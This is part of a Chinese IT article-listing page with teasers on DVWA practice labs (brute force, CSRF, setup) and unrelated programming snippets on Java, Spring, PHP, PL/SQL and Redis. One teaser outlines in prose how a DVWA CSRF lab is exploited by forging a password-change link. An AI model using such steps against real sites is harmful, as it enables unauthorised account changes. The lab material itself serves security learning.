                        <div>就是dvwa练习的第一个项暴力破解。第一方面我们普及一下怎么判断可以暴力破解：简单来说就是几个字，用户和密码可以多次输入。复杂来讲就是这个链接：没有找到讲这个，那么我这个二把刀就来讲一下：看它登录页面就只有账号，密码。接下来讲一下dvwa里面四个等级的解析，low级，简称白痴级别，官方给的英文为以下：Thedeveloperhascompletelymissedoutanyprotectionsm</div>
                    </li>
                    <li><a href="/article/1755427397169070080.htm"
                           title="DVWA-old (老版本)csrf" target="_blank">DVWA-old (老版本)csrf</a>
                        <span class="text-muted">玖龍的意志</span>
<a class="tag" taget="_blank" href="/search/csrf/1.htm">csrf</a><a class="tag" taget="_blank" href="/search/%E7%AC%94%E8%AE%B0/1.htm">笔记</a>
                        <div>csrflowmediumlow打开burp抓包，发现是get请求，尝试在burp中修改密码，发下可以直接修改成功根据url地址栏中的信息构造链接，将此链接放在.html为后缀的文件并将此文件放在本地www目录下，在保持登陆状态点击此链接就可以完成修改此时已经完成了修改medium本关有一个Referer字段，后面跟的请求来源的地址。当我们正常修改密码中请求包的Referer字段与我们修改请求包中</div>
                    </li>
                    <li><a href="/article/1755216299648106496.htm"
                           title="DVWA靶场下载安装" target="_blank">DVWA靶场下载安装</a>
                        <span class="text-muted">默默提升实验室</span>
<a class="tag" taget="_blank" href="/search/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/1.htm">信息安全</a><a class="tag" taget="_blank" href="/search/%E9%9D%B6%E5%9C%BA/1.htm">靶场</a>
                        <div>DVWA介绍DVWA一共包含了十个攻击模块，分别是:BruteForce(暴力破解)、CommandInjection(命令行注入)、CSRF(跨站请求伪造)、FileInclusion(文件包含)、FileUpload(文件上传)、InsecureCAPTCHA(不安全的验证码)、SQLInjection(SQL注入)、SQLInjectionBlind(SQL盲注)、XSSReflected(</div>
                    </li>
                    <li><a href="/article/1754804560532094976.htm"
                           title="CSRF：跨站请求伪造攻击" target="_blank">CSRF：跨站请求伪造攻击</a>
                        <span class="text-muted">未知百分百</span>
<a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/csrf/1.htm">csrf</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/dvwa/1.htm">dvwa</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a>
                        <div>目录什么是CSRF？DVWA中的CSRFlowmediumhightimpossible防御CSRF1、验证码2、referer校验3、cookie的Samesite属性4、Anti-CSRF-Token什么是CSRF？CSRF全称为跨站请求伪造（Cross-siterequestforgery），它是一种常见的Web攻击，下面我就来给大家通过学习+复习的方式介绍一下CSRF漏洞，并且会演示一下攻</div>
                    </li>
                    <li><a href="/article/1754650905048793088.htm"
                           title="Windows使用phpstudy_pro(小皮)安装DVWA时的一些错误及解决方法" target="_blank">Windows使用phpstudy_pro(小皮)安装DVWA时的一些错误及解决方法</a>
                        <span class="text-muted">Ugly_Rabbit123</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a>
                        <div>首先声明，本人第一次写博客，观感不好还请见谅！注意，任何修改文件的操作应该先做好备份！！！部分修改可能需要重启网页（需要在小皮中选择停止再选择启用，注意不要操作过快，否则Apache会和自己冲突，80端口连不上）、小皮甚至计算机才能生效。最近在学习DVWA，然而配置的时候遇到了各种各样的问题，有些问题，网上的博客中的方法尝试了也没用。最后还是自己根据DVWA网站的报错信息和配置文件的内容，进行各种</div>
                    </li>
                    <li><a href="/article/1754650648718098432.htm"
                           title="如何安装DVWA靶机和PHP study小皮面板思路" target="_blank">如何安装DVWA靶机和PHP study小皮面板思路</a>
                        <span class="text-muted">小飞侠之飞侠不会飞</span>
<a class="tag" taget="_blank" href="/search/DVWA/1.htm">DVWA</a><a class="tag" taget="_blank" href="/search/php/1.htm">php</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/apache/1.htm">apache</a>
                        <div>文章目录PHPstudy安装教程1、先下载"PhpStudy"环境，官方链接：https://www.xp.cn/。2、DVWA官方下载链接：https://dvwa.co.uk/PHPstudy安装教程首先准备好window7虚拟机1、先下载"PhpStudy"环境，官方链接：https://www.xp.cn/。安装推荐版本就行，我用的是PHPstudyv8.1版本下载好之后直接安装就好（注意</div>
                    </li>
                                <li><a href="/article/86.htm"
                                       title="linux系统服务器下jsp传参数乱码" target="_blank">linux系统服务器下jsp传参数乱码</a>
                                    <span class="text-muted">3213213333332132</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/jsp/1.htm">jsp</a><a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/windows/1.htm">windows</a><a class="tag" taget="_blank" href="/search/xml/1.htm">xml</a>
                                    <div>在一次解决乱码问题中， 发现jsp在windows下用js原生的方法进行编码没有问题，但是到了linux下就有问题， escape,encodeURI,encodeURIComponent等都解决不了问题 
但是我想了下既然原生的方法不行，我用el标签的方式对中文参数进行加密解密总该可以吧。于是用了java的java.net.URLDecoder,结果还是乱码，最后在绝望之际，用了下面的方法解决了</div>
                                </li>
                                <li><a href="/article/213.htm"
                                       title="Spring 注解区别以及应用" target="_blank">Spring 注解区别以及应用</a>
                                    <span class="text-muted">BlueSkator</span>
<a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a>
                                    <div>1. @Autowired 
@Autowired是根据类型进行自动装配的。如果当Spring上下文中存在不止一个UserDao类型的bean，或者不存在UserDao类型的bean，会抛出 BeanCreationException异常，这时可以通过在该属性上再加一个@Qualifier注解来声明唯一的id解决问题。 
&nbsp; 
2. @Qualifier 
当spring中存在至少一个匹</div>
                                </li>
                                <li><a href="/article/340.htm"
                                       title="printf和sprintf的应用" target="_blank">printf和sprintf的应用</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/PHP/1.htm">PHP</a><a class="tag" taget="_blank" href="/search/sprintf/1.htm">sprintf</a><a class="tag" taget="_blank" href="/search/printf/1.htm">printf</a>
                                    <div>&lt;?php
printf('b: %b &lt;br&gt;c: %c &lt;br&gt;d: %d &lt;bf&gt;f: %f', 80,80, 80, 80);
echo '&lt;br /&gt;';
printf('%0.2f &lt;br&gt;%+d &lt;br&gt;%0.2f &lt;br&gt;', 8, 8, 1235.456);

printf('th</div>
                                </li>
                                <li><a href="/article/467.htm"
                                       title="config.getInitParameter" target="_blank">config.getInitParameter</a>
                                    <span class="text-muted">171815164</span>
<a class="tag" taget="_blank" href="/search/parameter/1.htm">parameter</a>
                                    <div>web.xml 
 
 &lt;servlet&gt;
  	&lt;servlet-name&gt;servlet1&lt;/servlet-name&gt;
  	&lt;jsp-file&gt;/index.jsp&lt;/jsp-file&gt;
  	&lt;init-param&gt;
  		&lt;param-name&gt;str&lt;/param-name&gt;
</div>
                                </li>
                                <li><a href="/article/594.htm"
                                       title="Ant标签详解--基础操作" target="_blank">Ant标签详解--基础操作</a>
                                    <span class="text-muted">g21121</span>
<a class="tag" taget="_blank" href="/search/ant/1.htm">ant</a>
                                    <div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Ant的一些核心概念： 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; build.xml：构建文件是以XML 文件来描述的，默认构建文件名为build.xml。&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; project：每个构建文</div>
                                </li>
                                <li><a href="/article/721.htm"
                                       title="[简单]代码片段_数据合并" target="_blank">[简单]代码片段_数据合并</a>
                                    <span class="text-muted">53873039oycg</span>
<a class="tag" taget="_blank" href="/search/%E4%BB%A3%E7%A0%81/1.htm">代码</a>
                                    <div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 合并规则:删除家长phone为空的记录,若一个家长对应多个孩子,保留一条家长记录,家长id修改为phone,对应关系也要修改。 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 代码如下: 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</div>
                                </li>
                                <li><a href="/article/848.htm"
                                       title="java 通信技术" target="_blank">java 通信技术</a>
                                    <span class="text-muted">云端月影</span>
<a class="tag" taget="_blank" href="/search/Java+%E8%BF%9C%E7%A8%8B%E9%80%9A%E4%BF%A1%E6%8A%80%E6%9C%AF/1.htm">Java 远程通信技术</a>
                                    <div>在分布式服务框架中，一个最基础的问题就是远程服务是怎么通讯的，在Java领域中有很多可实现远程通讯的技术，例如：RMI、MINA、ESB、Burlap、Hessian、SOAP、EJB和JMS等，这些名词之间到底是些什么关系呢，它们背后到底是基于什么原理实现的呢，了解这些是实现分布式服务框架的基础知识，而如果在性能上有高的要求的话，那深入了解这些技术背后的机制就是必须的了，在这篇blog中我们将来</div>
                                </li>
                                <li><a href="/article/975.htm"
                                       title="string与StringBuilder 性能差距到底有多大" target="_blank">string与StringBuilder 性能差距到底有多大</a>
                                    <span class="text-muted">aijuans</span>

                                    <div>&nbsp; 
&nbsp; &nbsp; &nbsp; &nbsp; 之前也看过一些对string与StringBuilder的性能分析，总感觉这个应该对整体性能不会产生多大的影响，所以就一直没有关注这块！ 
&nbsp; &nbsp; &nbsp; &nbsp; 由于学程序初期最先接触的string拼接，所以就一直没改变过自己的习惯！ 
&nbsp; &nbsp; &nbsp; &nbsp; </div>
                                </li>
                                <li><a href="/article/1102.htm"
                                       title="今天碰到 java.util.ConcurrentModificationException 异常" target="_blank">今天碰到 java.util.ConcurrentModificationException 异常</a>
                                    <span class="text-muted">antonyup_2006</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E5%A4%9A%E7%BA%BF%E7%A8%8B/1.htm">多线程</a><a class="tag" taget="_blank" href="/search/%E5%B7%A5%E4%BD%9C/1.htm">工作</a><a class="tag" taget="_blank" href="/search/IBM/1.htm">IBM</a>
                                    <div>今天改bug，其中有个实现是要对map进行循环，然后有删除操作，代码如下： 

Iterator&lt;ListItem&gt; iter = ItemMap.keySet.iterator();
while(iter.hasNext()){
ListItem it = iter.next();
//...一些逻辑操作
ItemMap.remove(it);
}
 
结果运行报Con</div>
                                </li>
                                <li><a href="/article/1229.htm"
                                       title="PL/SQL的类型和JDBC操作数据库" target="_blank">PL/SQL的类型和JDBC操作数据库</a>
                                    <span class="text-muted">百合不是茶</span>
<a class="tag" taget="_blank" href="/search/PL%2FSQL%E8%A1%A8/1.htm">PL/SQL表</a><a class="tag" taget="_blank" href="/search/%E6%A0%87%E9%87%8F%E7%B1%BB%E5%9E%8B/1.htm">标量类型</a><a class="tag" taget="_blank" href="/search/%E6%B8%B8%E6%A0%87/1.htm">游标</a><a class="tag" taget="_blank" href="/search/PL%2FSQL%E8%AE%B0%E5%BD%95/1.htm">PL/SQL记录</a>
                                    <div>PL/SQL的标量类型: 
&nbsp;&nbsp; 字符,数字,时间,布尔,%type五中类型的 
--标量：数据库中预定义类型的变量
--定义一个变长字符串 
v_ename varchar2(10); 

--定义一个小数,范围 -9999.99~9999.99 
v_sal number(6,2); 

--定义一个小数并给一个初始值为5.4 :=是pl/sql的赋值号 
</div>
                                </li>
                                <li><a href="/article/1356.htm"
                                       title="Mockito：一个强大的用于 Java 开发的模拟测试框架实例" target="_blank">Mockito：一个强大的用于 Java 开发的模拟测试框架实例</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/mockito/1.htm">mockito</a><a class="tag" taget="_blank" href="/search/%E5%8D%95%E5%85%83%E6%B5%8B%E8%AF%95/1.htm">单元测试</a>
                                    <div>Mockito框架： 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Mockito是一个基于MIT协议的开源java测试框架。&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Mockito区别于其他模拟框架的地方主要是允许开发者在没有建立“预期”时验证被测系统的行为。对于mock对象的一个评价是测试系统的测</div>
                                </li>
                                <li><a href="/article/1483.htm"
                                       title="精通Oracle10编程SQL(10)处理例外" target="_blank">精通Oracle10编程SQL(10)处理例外</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a><a class="tag" taget="_blank" href="/search/plsql/1.htm">plsql</a>
                                    <div>/*
 *处理例外
 */
--例外简介
--处理例外-传递例外
declare
   v_ename emp.ename%TYPE;
begin
   SELECT ename INTO v_ename FROM emp
      where empno=&amp;no;
   dbms_output.put_line('雇员名：'||v_ename);
exceptio</div>
                                </li>
                                <li><a href="/article/1610.htm"
                                       title="【Java】Java执行远程机器上Linux命令" target="_blank">【Java】Java执行远程机器上Linux命令</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/linux%E5%91%BD%E4%BB%A4/1.htm">linux命令</a>
                                    <div>Java使用ethz通过ssh2执行远程机器Linux上命令， 
&nbsp; 
封装定义Linux机器的环境信息 
&nbsp; 
package com.tom;


import java.io.File;

public class Env {
    private String hostaddr; //Linux机器的IP地址
    private Integer po</div>
                                </li>
                                <li><a href="/article/1737.htm"
                                       title="java通信之Socket通信基础" target="_blank">java通信之Socket通信基础</a>
                                    <span class="text-muted">白糖_</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/socket/1.htm">socket</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE/1.htm">网络协议</a>
                                    <div>正处于网络环境下的两个程序，它们之间通过一个交互的连接来实现数据通信。每一个连接的通信端叫做一个Socket。一个完整的Socket通信程序应该包含以下几个步骤： 
①创建Socket； 
②打开连接到Socket的输入输出流； 
④按照一定的协议对Socket进行读写操作； 
④关闭Socket。 
&nbsp; 
Socket通信分两部分：服务器端和客户端。服务器端必须优先启动，然后等待soc</div>
                                </li>
                                <li><a href="/article/1864.htm"
                                       title="angular.bind" target="_blank">angular.bind</a>
                                    <span class="text-muted">boyitech</span>
<a class="tag" taget="_blank" href="/search/AngularJS/1.htm">AngularJS</a><a class="tag" taget="_blank" href="/search/angular.bind/1.htm">angular.bind</a><a class="tag" taget="_blank" href="/search/AngularJS+API/1.htm">AngularJS API</a><a class="tag" taget="_blank" href="/search/bind/1.htm">bind</a>
                                    <div>angular.bind   描述：   &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;上下文，函数以及参数动态绑定，返回值为绑定之后的函数. 其中args是可选的动态参数，self在fn中使用this调用。    使用方法：   &nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp; angular.bind(se</div>
                                </li>
                                <li><a href="/article/1991.htm"
                                       title="java-13个坏人和13个好人站成一圈，数到7就从圈里面踢出一个来，要求把所有坏人都给踢出来，所有好人都留在圈里。请找出初始时坏人站的位置。" target="_blank">java-13个坏人和13个好人站成一圈，数到7就从圈里面踢出一个来，要求把所有坏人都给踢出来，所有好人都留在圈里。请找出初始时坏人站的位置。</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                                    <div>
import java.util.ArrayList;
import java.util.List;


public class KickOutBadGuys {

	/**
	 * 题目：13个坏人和13个好人站成一圈，数到7就从圈里面踢出一个来，要求把所有坏人都给踢出来，所有好人都留在圈里。请找出初始时坏人站的位置。
	 * Maybe you can find out </div>
                                </li>
                                <li><a href="/article/2118.htm"
                                       title="Redis.conf配置文件及相关项说明（自查备用）" target="_blank">Redis.conf配置文件及相关项说明（自查备用）</a>
                                    <span class="text-muted">Kai_Ge</span>
<a class="tag" taget="_blank" href="/search/redis/1.htm">redis</a>
                                    <div>&nbsp; &nbsp;Redis.conf配置文件及相关项说明 
# Redis configuration file example
 
# Note on units: when memory size is needed, it is possible to specifiy
# it in the usual form of 1k 5GB 4M and so forth:
#
</div>
                                </li>
                                <li><a href="/article/2245.htm"
                                       title="[强人工智能]实现大规模拓扑分析是实现强人工智能的前奏" target="_blank">[强人工智能]实现大规模拓扑分析是实现强人工智能的前奏</a>
                                    <span class="text-muted">comsci</span>
<a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a>
                                    <div> 
 
&nbsp;&nbsp;&nbsp;&nbsp; 真不好意思,各位朋友...博客再次更新... 
 
&nbsp;&nbsp;&nbsp;&nbsp; 节点数量太少,网络的分析和处理能力肯定不足,在面对机器人控制的需求方面,显得力不从心.... 
 
&nbsp;&nbsp;&nbsp;&nbsp; 但是,节点数太多,对拓扑数据处理的要求又很高,设计目标也很高,实现起来难度颇大... 
 </div>
                                </li>
                                <li><a href="/article/2372.htm"
                                       title="记录一些常用的函数" target="_blank">记录一些常用的函数</a>
                                    <span class="text-muted">dai_lm</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                                    <div>
public static String convertInputStreamToString(InputStream is) {

	StringBuilder result = new StringBuilder();

	if (is != null)
		try {
			InputStreamReader inputReader = new InputStreamRead</div>
                                </li>
                                <li><a href="/article/2499.htm"
                                       title="Hadoop中小规模集群的并行计算缺陷" target="_blank">Hadoop中小规模集群的并行计算缺陷</a>
                                    <span class="text-muted">datamachine</span>
<a class="tag" taget="_blank" href="/search/mapreduce/1.htm">mapreduce</a><a class="tag" taget="_blank" href="/search/hadoop/1.htm">hadoop</a><a class="tag" taget="_blank" href="/search/%E5%B9%B6%E8%A1%8C%E8%AE%A1%E7%AE%97/1.htm">并行计算</a>
                                    <div>注：写这篇文章的初衷是因为Hadoop炒得有点太热，很多用户现有数据规模并不适用于Hadoop，但迫于扩容压力和去IOE（Hadoop的廉价扩展的确非常有吸引力）而尝试。尝试永远是件正确的事儿，但有时候不用太突进，可以调优或调需求，发挥现有系统的最大效用为上策。 
 
-----------------------------------------------------------------</div>
                                </li>
                                <li><a href="/article/2626.htm"
                                       title="小学4年级英语单词背诵第二课" target="_blank">小学4年级英语单词背诵第二课</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/english/1.htm">english</a><a class="tag" taget="_blank" href="/search/word/1.htm">word</a>
                                    <div>egg &nbsp;蛋 
twenty 二十 
any 任何 
well 健康的，好 
&nbsp; 
twelve 十二 
farm 农场 
every 每一个 
back 向后，回 
&nbsp; 
fast 快速的 
whose 谁的 
much 许多 
flower 花 
&nbsp; 
watch 手表 
very 非常，很 
sport 运动 
Chinese 中国的 
&nbsp; </div>
                                </li>
                                <li><a href="/article/2753.htm"
                                       title="自己实践了github的webhooks, linux上面的权限需要注意" target="_blank">自己实践了github的webhooks, linux上面的权限需要注意</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/github/1.htm">github</a><a class="tag" taget="_blank" href="/search/webhook/1.htm">webhook</a>
                                    <div>环境, 阿里云服务器 
&nbsp; 
1. 本地创建项目, push到github服务器上面 
&nbsp; 
2. 生成www用户的密钥 
sudo -u www ssh-keygen -t rsa -C &quot;xxx@xx.com&quot; 
&nbsp; 
&nbsp; 
3. 将密钥添加到github帐号的SSH_KEYS里面 
&nbsp; 
3. 用www用户执行克隆, 源使</div>
                                </li>
                                <li><a href="/article/2880.htm"
                                       title="Java冒泡排序" target="_blank">Java冒泡排序</a>
                                    <span class="text-muted">蕃薯耀</span>
<a class="tag" taget="_blank" href="/search/%E5%86%92%E6%B3%A1%E6%8E%92%E5%BA%8F/1.htm">冒泡排序</a><a class="tag" taget="_blank" href="/search/Java%E5%86%92%E6%B3%A1%E6%8E%92%E5%BA%8F/1.htm">Java冒泡排序</a><a class="tag" taget="_blank" href="/search/Java%E6%8E%92%E5%BA%8F/1.htm">Java排序</a>
                                    <div>冒泡排序 
&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; 
蕃薯耀 2015年6月23日 10:40:14 星期二 
http://fanshuyao.iteye.com/</div>
                                </li>
                                <li><a href="/article/3007.htm"
                                       title="Excle读取数据转换为实体List【基于apache-poi】" target="_blank">Excle读取数据转换为实体List【基于apache-poi】</a>
                                    <span class="text-muted">hanqunfeng</span>
<a class="tag" taget="_blank" href="/search/apache/1.htm">apache</a>
                                    <div>1.依赖apache-poi 
&nbsp; 
2.支持xls和xlsx 
&nbsp; 
3.支持按属性名称绑定数据值 
&nbsp; 
4.支持从指定行、列开始读取 
&nbsp; 
5.支持同时读取多个sheet 
&nbsp; 
6.具体使用方式参见org.cpframework.utils.excelreader.CP_ExcelReaderUtilTest.java 
比如： 
Str</div>
                                </li>
                                <li><a href="/article/3134.htm"
                                       title="3个处于草稿阶段的Javascript API介绍" target="_blank">3个处于草稿阶段的Javascript API介绍</a>
                                    <span class="text-muted">jackyrong</span>
<a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a>
                                    <div>原文： 
http://www.sitepoint.com/3-new-javascript-apis-may-want-follow/?utm_source=html5weekly&amp;utm_medium=email 
 
 
&nbsp; 本文中，介绍3个仍然处于草稿阶段，但应该值得关注的Javascript API. 
 
1) Web Alarm API 
&nbsp;&nbsp;&</div>
                                </li>
                                <li><a href="/article/3261.htm"
                                       title="6个创建Web应用程序的高效PHP框架" target="_blank">6个创建Web应用程序的高效PHP框架</a>
                                    <span class="text-muted">lampcy</span>
<a class="tag" taget="_blank" href="/search/Web/1.htm">Web</a><a class="tag" taget="_blank" href="/search/%E6%A1%86%E6%9E%B6/1.htm">框架</a><a class="tag" taget="_blank" href="/search/PHP/1.htm">PHP</a>
                                    <div>以下是创建Web应用程序的PHP框架，有coder bay网站整理推荐： 
1. CakePHP 
CakePHP是一个PHP快速开发框架，它提供了一个用于开发、维护和部署应用程序的可扩展体系。CakePHP使用了众所周知的设计模式，如MVC和ORM，降低了开发成本，并减少了开发人员写代码的工作量。 
2. CodeIgniter 
CodeIgniter是一个非常小且功能强大的PHP框架，适合需</div>
                                </li>
                                <li><a href="/article/3388.htm"
                                       title="评"救市后中国股市新乱象泛起"谣言" target="_blank">评"救市后中国股市新乱象泛起"谣言</a>
                                    <span class="text-muted">nannan408</span>

                                    <div>首先来看百度百家一位易姓作者的新闻： 
 

    三个多星期来股市持续暴跌，跌得投资者及上市公司都处于极度的恐慌和焦虑中，都要寻找自保及规避风险的方式。面对股市之危机，政府突然进入市场救市，希望以此来重建市场信心，以此来扭转股市持续暴跌的预期。而政府进入市场后，由于市场运作方式发生了巨大变化，投资者及上市公司为了自保及为了应对这种变化，中国股市新的乱象也自然产生。

首先，中国股市这两天</div>
                                </li>
                                <li><a href="/article/3515.htm"
                                       title="页面全屏遮罩的实现 方式" target="_blank">页面全屏遮罩的实现 方式</a>
                                    <span class="text-muted">Rainbow702</span>
<a class="tag" taget="_blank" href="/search/html/1.htm">html</a><a class="tag" taget="_blank" href="/search/css/1.htm">css</a><a class="tag" taget="_blank" href="/search/%E9%81%AE%E7%BD%A9/1.htm">遮罩</a><a class="tag" taget="_blank" href="/search/mask/1.htm">mask</a>
                                    <div>之前做了一个页面，在点击了某个按钮之后，要求页面出现一个全屏遮罩，一开始使用了position:absolute来实现的。当时因为画面大小是固定的，不可以resize的，所以，没有发现问题。 
最近用了同样的做法做了一个遮罩，但是画面是可以进行resize的，所以就发现了一个问题，当画面被reisze到浏览器出现了滚动条的时候，就发现，用absolute 的做法是有问题的。后来改成fixed定位就</div>
                                </li>
                                <li><a href="/article/3642.htm"
                                       title="关于angularjs的点滴" target="_blank">关于angularjs的点滴</a>
                                    <span class="text-muted">tntxia</span>
<a class="tag" taget="_blank" href="/search/AngularJS/1.htm">AngularJS</a>
                                    <div>&nbsp; 
angular是一个新兴的JS框架，和以往的框架不同的事，Angularjs更注重于js的建模，管理，同时也提供大量的组件帮助用户组建商业化程序，是一种值得研究的JS框架。 
&nbsp; 
Angularjs使我们可以使用MVC的模式来写JS。Angularjs现在由谷歌来维护。 
&nbsp; 
这里我们来简单的探讨一下它的应用。 
&nbsp; 
首先使用Angularjs我</div>
                                </li>
                                <li><a href="/article/3769.htm"
                                       title="Nutz--->>反复新建ioc容器的后果" target="_blank">Nutz--->>反复新建ioc容器的后果</a>
                                    <span class="text-muted">xiaoxiao1992428</span>
<a class="tag" taget="_blank" href="/search/DAO/1.htm">DAO</a><a class="tag" taget="_blank" href="/search/mvc/1.htm">mvc</a><a class="tag" taget="_blank" href="/search/IOC/1.htm">IOC</a><a class="tag" taget="_blank" href="/search/nutz/1.htm">nutz</a>
                                    <div>问题： 
public class DaoZ { 
&nbsp; 
&nbsp; public static Dao dao() { // 每当需要使用dao的时候就取一次 
&nbsp;&nbsp;&nbsp; Ioc ioc = new NutIoc(new JsonLoader(&quot;dao.js&quot;)); 
&nbsp;&nbsp;&nbsp; return ioc.get(</div>
                                </li>
                </ul>
            </div>
        </div>
    </div>

<div>
    <div class="container">
        <div class="indexes">
            <strong>按字母分类：</strong>
            <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a
                href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a
                href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a
                href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a
                href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a
                href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a
                href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a
                href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a
                href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a>
        </div>
    </div>
</div>
<footer id="footer" class="mb30 mt30">
    <div class="container">
        <div class="footBglm">
            <a target="_blank" href="/">首页</a> -
            <a target="_blank" href="/custom/about.htm">关于我们</a> -
            <a target="_blank" href="/search/Java/1.htm">站内搜索</a> -
            <a target="_blank" href="/sitemap.txt">Sitemap</a> -
            <a target="_blank" href="/custom/delete.htm">侵权投诉</a>
        </div>
        <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.
<!--            <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>-->
        </div>
    </div>
</footer>
<!-- 代码高亮 -->
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script>
<link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/>
<script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script>





</body>

</html>